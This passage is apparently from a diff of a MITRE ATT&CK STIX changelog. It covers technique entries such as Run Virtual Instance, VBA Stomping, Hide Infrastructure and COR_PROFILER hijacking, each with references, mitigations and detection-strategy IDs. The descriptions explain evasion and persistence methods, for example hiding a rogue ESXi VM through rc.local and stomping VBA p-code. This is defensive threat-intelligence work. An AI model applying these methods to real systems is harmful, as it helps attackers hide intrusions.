+                            "source_name": "macOS Hierarchical File System Overview",
+                            "description": "Tenon. (n.d.). Retrieved October 12, 2021.",
+                            "url": "http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ivan Sinyakov",
+                        "Jaron Bradley @jbradley89"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.708000+00:00\", \"old_value\": \"2026-04-15 20:25:32.891000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0584: Detection Strategy for Resource Forking on macOS"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-29 15:36:41.535000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Run Virtual Instance",
+                    "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance.(Citation: CyberCX Akira Ransomware) Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V), deploy lightweight emulators (ex: QEMU), or drop the necessary files to run a virtual instance (ex: VirtualBox binaries).(Citation: Securonix CronTrap 2024) After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)\n\nThreat actors may also leverage temporary virtualized environments such as the Windows Sandbox, which supports the use of `.wsb` configuration files for defining execution parameters. For example, the `<MappedFolder>` property supports the creation of a shared folder, while the `<LogonCommand>` property allows the specification of a payload.(Citation: ESET MirrorFace 2025)(Citation: ITOCHU Hack the Sandbox)(Citation: ITOCHU Sandbox PPT)\n\nIn VMWare environments, adversaries may leverage the vCenter console to create new virtual machines. However, they may also create virtual machines directly on ESXi servers by running a valid `.vmx` file with the `/bin/vmx` utility. Adding this command to `/etc/rc.local.d/local.sh` (i.e., [RC Scripts](https://attack.mitre.org/techniques/T1037/004)) will cause the VM to persistently restart.(Citation: vNinja Rogue VMs 2024) Creating a VM this way prevents it from appearing in the vCenter console or in the output to the `vim-cmd vmsvc/getallvms` command on the ESXi server, thereby hiding it from typical administrative activities.(Citation: MITRE VMware Abuse 2024)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/006",
+                            "external_id": "T1564.006"
+                        },
+                        {
+                            "source_name": "ESET MirrorFace 2025",
+                            "description": " Dominik Breitenbacher. (2025, March 18). Operation AkaiRy\u016b: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor. Retrieved May 22, 2025.",
+                            "url": "https://www.welivesecurity.com/en/eset-research/operation-akairyu-mirrorface-invites-europe-expo-2025-revives-anel-backdoor/"
+                        },
+                        {
+                            "source_name": "vNinja Rogue VMs 2024",
+                            "description": "Christian Mohn. (2024, November 11). Beware Of The Rogue VMs!. Retrieved March 26, 2025.",
+                            "url": "https://vninja.net/2024/11/11/beware-of-the-rogue-vms/"
+                        },
+                        {
+                            "source_name": "SingHealth Breach Jan 2019",
+                            "description": "Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited's Patient Database. Retrieved June 29, 2020.",
+                            "url": "https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx"
+                        },
+                        {
+                            "source_name": "CyberCX Akira Ransomware",
+                            "description": "CyberCX. (2023, September 15). Weaponising VMs to bypass EDR \u2013 Akira ransomware. Retrieved April 4, 2025.",
+                            "url": "https://cybercx.com.au/blog/akira-ransomware/"
+                        },
+                        {
+                            "source_name": "Securonix CronTrap 2024",
+                            "description": "Den Iuzvyk and Tim Peck. (2024, November 4). CRON#TRAP: Emulated Linux Environments as the Latest Tactic in Malware Staging. Retrieved May 22, 2025.",
+                            "url": "https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/"
+                        },
+                        {
+                            "source_name": "ITOCHU Hack the Sandbox",
+                            "description": "ITOCHU Cyber & Intelligence Inc.. (2025, March 12). Hack The Sandbox: Unveiling the Truth Behind Disappearing Artifacts. Retrieved November 5, 2025.",
+                            "url": "https://blog-en.itochuci.co.jp/entry/2025/03/12/140000"
+                        },
+                        {
+                            "source_name": "ITOCHU Sandbox PPT",
+                            "description": "ITOCHU Cyber & Intelligence Inc.. (n.d.). Hack The Sandbox: Unveiling the Truth Behind Disappearing Artifacts. Retrieved November 5, 2025.",
+                            "url": "https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_2_9_kamekawa_sasada_niwa_en.pdf"
+                        },
+                        {
+                            "source_name": "MITRE VMware Abuse 2024",
+                            "description": "Lex Crumpton. (2024, May 22). Infiltrating Defenses: Abusing VMware in MITRE\u2019s Cyber Intrusion. Retrieved March 26, 2025.",
+                            "url": "https://medium.com/mitre-engenuity/infiltrating-defenses-abusing-vmware-in-mitres-cyber-intrusion-4ea647b83f5b"
+                        },
+                        {
+                            "source_name": "Sophos Ragnar May 2020",
+                            "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.",
+                            "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Enis Aksu",
+                        "Janantha Marasinghe",
+                        "Jiraput Thamsongkrah",
+                        "Johann Rehberger",
+                        "Menachem Shafran, XM Cyber",
+                        "Natthawut Saexu",
+                        "Purinut Wongwaiwuttiguldej",
+                        "Satoshi Kamekawa, ITOCHU Cyber & Intelligence Inc.",
+                        "Shuhei Sasada, ITOCHU Cyber & Intelligence Inc.",
+                        "Yusuke Niwa, ITOCHU Cyber & Intelligence Inc."
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-15 20:26:04.116000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0321: Detection Strategy for Hidden Virtual Instance Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-09-17 12:51:40.845000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "VBA Stomping",
+                    "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a <code>PerformanceCache</code> that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero\u2019s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the <code>_VBA_PROJECT</code> stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/007",
+                            "external_id": "T1564.007"
+                        },
+                        {
+                            "source_name": "pcodedmp Bontchev",
+                            "description": "Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.",
+                            "url": "https://github.com/bontchev/pcodedmp"
+                        },
+                        {
+                            "source_name": "FireEye VBA stomp Feb 2020",
+                            "description": "Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html"
+                        },
+                        {
+                            "source_name": "Evil Clippy May 2019",
+                            "description": "Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.",
+                            "url": "https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/"
+                        },
+                        {
+                            "source_name": "Microsoft _VBA_PROJECT Stream",
+                            "description": "Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239"
+                        },
+                        {
+                            "source_name": "Walmart Roberts Oct 2018",
+                            "description": "Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping \u2014 Advanced Maldoc Techniques. Retrieved September 17, 2020.",
+                            "url": "https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Rick Cole, Mandiant"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2026-04-15 20:26:09.220000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0012: Detection Strategy for VBA Stomping"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-02-13 17:00:00.175000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Hide Infrastructure",
+                    "description": "Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.\n\nC2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies)\n\nAdversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite)\n\nHiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1665",
+                            "external_id": "T1665"
+                        },
+                        {
+                            "source_name": "SocGholish-update",
+                            "description": "Andrew Northern. (2022, November 22). SocGholish, a very real threat from a very fake update. Retrieved February 13, 2024.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update"
+                        },
+                        {
+                            "source_name": "TA571",
+                            "description": "Axel F, Selena Larson. (2023, October 30).  TA571 Delivers IcedID Forked Loader. Retrieved February 13, 2024.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta571-delivers-icedid-forked-loader"
+                        },
+                        {
+                            "source_name": "mod_rewrite",
+                            "description": "Bluescreenofjeff.com. (2015, April 12). Combatting Incident Responders with Apache mod_rewrite. Retrieved February 13, 2024.",
+                            "url": "https://bluescreenofjeff.com/2016-04-12-combatting-incident-responders-with-apache-mod_rewrite/"
+                        },
+                        {
+                            "source_name": "Browser-updates",
+                            "description": "Dusty Miller. (2023, October 17). Are You Sure Your Browser is Up to Date? The Current Landscape of Fake Browser Updates . Retrieved February 13, 2024.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates"
+                        },
+                        {
+                            "source_name": "StarBlizzard",
+                            "description": "Microsoft Threat Intelligence. (2023, December 7). Star Blizzard increases sophistication and evasion in ongoing attacks. Retrieved February 13, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/"
+                        },
+                        {
+                            "source_name": "QR-cofense",
+                            "description": "Nathaniel Raymond. (2023, August 16). Major Energy Company Targeted in Large QR Code Phishing Campaign. Retrieved February 13, 2024.",
+                            "url": "https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/"
+                        },
+                        {
+                            "source_name": "Schema-abuse",
+                            "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved February 13, 2024.",
+                            "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse"
+                        },
+                        {
+                            "source_name": "Orange Residential Proxies",
+                            "description": "Orange Cyberdefense. (2024, March 14). Unveiling the depths of residential proxies providers. Retrieved April 11, 2024.",
+                            "url": "https://www.orangecyberdefense.com/global/blog/research/residential-proxies"
+                        },
+                        {
+                            "source_name": "Facad1ng",
+                            "description": "Spyboy. (2023). Facad1ng. Retrieved February 13, 2024.",
+                            "url": "https://github.com/spyboy-productions/Facad1ng"
+                        },
+                        {
+                            "source_name": "sysdig",
+                            "description": "Sysdig. (2023). Sysdig Global Cloud Threat Report. Retrieved March 1, 2024.",
+                            "url": "https://sysdig.com/content/c/pf-2023-global-cloud-threat-report?x=u_WFRi&xs=524303#page=1"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Diyar Saadi Ali",
+                        "Eliav Livneh",
+                        "Hen Porcilan",
+                        "Matt Mullins"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-10-22 03:57:22.646000+00:00\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0411: Detection Strategy for Hide Infrastructure"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-12 20:38:12.465000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Hijack Execution Flow",
+                    "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574",
+                            "external_id": "T1574"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2026-04-20 21:18:17.156000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1024: Restrict Registry Permissions",
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1044: Restrict Library Loading",
+                            "M1047: Audit",
+                            "M1051: Update Software",
+                            "M1052: User Account Control"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0218: Detection Strategy for Hijack Execution Flow across OS platforms."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-28 15:36:34.141000+00:00",
+                    "modified": "2026-05-12 15:12:00.626000+00:00",
+                    "name": "AppDomainManager",
+                    "description": "Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) \n\nKnown as \"AppDomainManager injection,\" adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/014",
+                            "external_id": "T1574.014"
+                        },
+                        {
+                            "source_name": "PenTestLabs AppDomainManagerInject",
+                            "description": "Administrator. (2020, May 26). APPDOMAINMANAGER INJECTION AND DETECTION. Retrieved March 28, 2024.",
+                            "url": "https://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/"
+                        },
+                        {
+                            "source_name": "Microsoft App Domains",
+                            "description": "Microsoft. (2021, September 15). Application domains. Retrieved March 28, 2024.",
+                            "url": "https://learn.microsoft.com/dotnet/framework/app-domains/application-domains"
+                        },
+                        {
+                            "source_name": "PwC Yellow Liderc",
+                            "description": "PwC Threat Intelligence. (2023, October 25). Yellow Liderc ships its scripts and delivers IMAPLoader malware. Retrieved March 29, 2024.",
+                            "url": "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html"
+                        },
+                        {
+                            "source_name": "Rapid7 AppDomain Manager Injection",
+                            "description": "Spagnola, N. (2023, May 5). AppDomain Manager Injection: New Techniques For Red Teams. Retrieved March 29, 2024.",
+                            "url": "https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ivy Drexel",
+                        "Thomas B"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.626000+00:00\", \"old_value\": \"2026-04-15 22:57:09.601000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0517: Detection Strategy for Hijack Execution Flow through the AppDomainManager on Windows."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-24 22:30:55.843000+00:00",
+                    "modified": "2026-05-12 15:12:00.727000+00:00",
+                    "name": "COR_PROFILER",
+                    "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and impair defenses provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/012",
+                            "external_id": "T1574.012"
+                        },
+                        {
+                            "source_name": "Almond COR_PROFILER Apr 2019",
+                            "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.",
+                            "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html"
+                        },
+                        {
+                            "source_name": "Red Canary COR_PROFILER May 2020",
+                            "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.",
+                            "url": "https://redcanary.com/blog/cor_profiler-for-persistence/"
+                        },
+                        {
+                            "source_name": "RedCanary Mockingbird May 2020",
+                            "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.",
+                            "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/"
+                        },
+                        {
+                            "source_name": "Microsoft COR_PROFILER Feb 2013",
+                            "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)"
+                        },
+                        {
+                            "source_name": "Microsoft Profiling Mar 2017",
